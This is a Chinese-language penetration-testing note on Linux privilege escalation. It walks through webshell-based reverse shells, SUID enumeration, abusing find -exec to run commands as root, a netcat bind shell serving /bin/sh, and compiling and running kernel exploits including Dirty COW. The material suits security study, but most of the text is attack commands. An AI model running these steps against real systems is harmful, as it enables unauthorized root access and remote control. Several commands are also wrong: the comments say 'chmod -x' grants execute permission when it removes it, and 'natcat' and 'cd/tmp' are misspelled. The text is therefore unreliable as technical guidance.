Linux提权自动化脚本利用(信息收集):
信息收集:
- LinEnum
- linuxprivchecker
信息探针:
- linux-exploit-suggester
- linux-exploit-suggester2
Linux-SUID提权-web:
漏洞成因:chmod u+s给予了suid u-s删除了suid
- 冰蝎连接后门程序
- 通过冰蝎的反弹shell进行msf反弹
这个时候,两种方法,可以通过冰蝎传信息收集工具,或者可以通过反弹回来的shell进行上传上去:
upload /root/linenum.sh /tmp/linenum.sh
//这条命令是将自己服务器上root文件夹中的linenum文件上传到我们目前已经成功反弹shell的服务器上的tmp这个临时文件里并起名叫linenum.sh,也可以叫xiaoyao.sh
- 执行信息收集工具
./linenum.sh //如果执行不了,我们用下面这个命令让其有权限执行
chmod -x linenum.sh //给予权限后再重修执行我们的信息收集工具
- 手工探查信息也是可以
find / -user root -perm -4000 print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
- 下面是一些可用于产生shell的程序
nmap
vim
less
more
nano
cp
mv
find
- find举例
touch xiaoyao
find xiaoyao -exec whoami \; //此时回显root
- nc反弹
find xiaoyao -exec natcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555
Linux-内核漏洞提权-本地:
- 过程
-
- 连接
- 获取可利用漏洞
- 下载或上传exp
- 编译exp
- 给权限执行exp
- 上传漏洞探针并执行
perl linux-exploit-suggester2.pl
- 有可利用漏洞的情况下上传exp
- 编译exp并执行
gcc 45010.c -o 45010 //编译45010.c文件后输出文件45010
./45010 //执行exp
chmod -x 45010 //如果不能执行的话,再来一次给予执行权限
Linux-脏牛内核漏洞提权:
- 上传漏洞exp
upload /root/dcow.cpp /tmp/40847.cpp
- 进入shell会话
cd/tmp //进入存放exp的目录
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o xiaoyao 40847.cpp -lutil //编译文件,将40847.cpp编译成xiaoyao可执行文件
python -c 'import pty; pty.spawn("/bin/bash")' //起一个交互shell
./xiaoyao //执行exp,吃到大西瓜,如果没有吃到大西瓜,那就gg吧